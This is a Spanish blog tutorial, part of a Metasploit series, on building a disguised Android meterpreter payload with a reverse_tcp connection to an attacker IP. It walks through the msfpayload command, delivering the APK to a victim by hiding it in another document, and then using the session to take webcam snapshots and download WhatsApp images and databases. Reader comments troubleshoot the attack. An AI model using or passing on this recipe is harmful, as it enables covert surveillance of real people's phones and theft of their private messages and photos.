viernes, 13 de diciembre de 2013

Kali Linux: de 0 a metasploit 5, Payload para Android indetectable

Serie: De 0 a Metasploit


Hoy vamos a conseguir una sesión de meterpreter en un sistema Android para demostrar que es exactamente igual de facil que en Windows, ademas comprobaremos como es indetectable por los antivirus.


Asi que nos abrimos nuestro metasploit con msfconsole.

Primero buscaremos el payload que queremos usar, como dijimos reverse_tcp es una excelente posibilidad para esta practica, generando la conexión desde dentro del Android hasta fuera con lo que no tendremos que abrir puertos ni nada extraño y saltaremos el firewall.


Lo siguiente es crear el Payload que vamos a ingresar en el Android con: 
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.167 R > /root/Desktop/crack.apk

Por si alguno va perdido:
android/meterprete/reverse_tcp : Es el payload que usaremos
LHOST <ip local> : Introduciremos nuestra IP que recibirá la conexión del payload
R Es la denominación apk, en Windows acordaros que hacíamos X para sacar .exe
>/ruta/archivo.apk : Es en que ruta se guardara y su nombre y extensión.



Este archivo lo pasamos como queramos al sistema Android: Ya sea subiendolo a Internet, bluetooth,por USB, ocultandolo con otro documento....

Creamos nuestra sesion que va a estar escuchando peticiones por si detecta la del payload.

Nos creara un estado esperando y vamos al android a instalar nuestra super aplicación.

Cuando apretemos en ReverseTCP abrira la sesión y si tenemos al metasploit escuchando conseguiremos la sesión de meterpreter que nos dará acceso al sistema Android victima.

Una vez dentro haremos los comandos que aprendimos en el tutorial de comandos basicos de meterpreter

Yo hago la prueba con: webcam_snap

Y como no podemos navegar por todos documentos que enviamos por WhatsApp y que se archivan en esta carpeta:

Por ejemplo accedere a las imagenes y descargaremos una de ellas.




Ahora podemos descargar las 2 bases de datos mas criticas a nivel de información personal que es la de whatsapp y la agenda, ambas están cifradas y que veremos en el siguiente capitulo.

Saludos guerreros!!

9 comentarios:

  1. Hey amigo fijate hago todo los pasos al 100% la apk se crea y hado todos los demás, instalo la apk pero no me deja abrirla y ni me sale el serverseTCP que pasa me podrias ayudar?

    ResponderEliminar
  2. Hola Dark, puede ser de muchas cosas: la mas comun seria que no hay comunicación entre ellos (haz ping para comprobarlo si estais en la misma red), si no hay prueba si hay algun firewall, esta bien configurada la red, antivirus de android, instalacion de aplicaciones de terceros...

    ResponderEliminar
  3. como rayos le piensas enviar el apk si nunca especificas la direccion ip remota??(nuestra victima)

    ResponderEliminar
    Respuestas
    1. Este archivo lo pasamos como queramos al sistema Android: Ya sea subiendolo a Internet, bluetooth,por USB, ocultandolo con otro documento....

      hay que leer todo amigo....

      Eliminar
  4. hola hago todo los pasos pero cuando paso mi apk a mi android no puedo instalarla, le doy instalar pero sale aplicacion no istalada, alguien sabe pq me pasa eso?

    ResponderEliminar
    Respuestas
    1. en ocaciones se crean las apps pero no tienen nada osea 0.0 kb,y pues obvio de esa manera no hay nada que instalar.

      Eliminar
  5. saben por que al realizar los pasos y al instalar la app no se hace la coneccion

    ResponderEliminar
    Respuestas
    1. pues no se hace la conexion debido a que despues de instalar el apk debes darle click y asi veras como el exploit inicia la sesion

      Eliminar
  6. Todo funcionaba bien hasta que cambio el ip de mi router ahora no puedo acceder a la payload tengo que crear otra con la nueva IP, y no pasara nada cuando el android ya tiene otra

    ResponderEliminar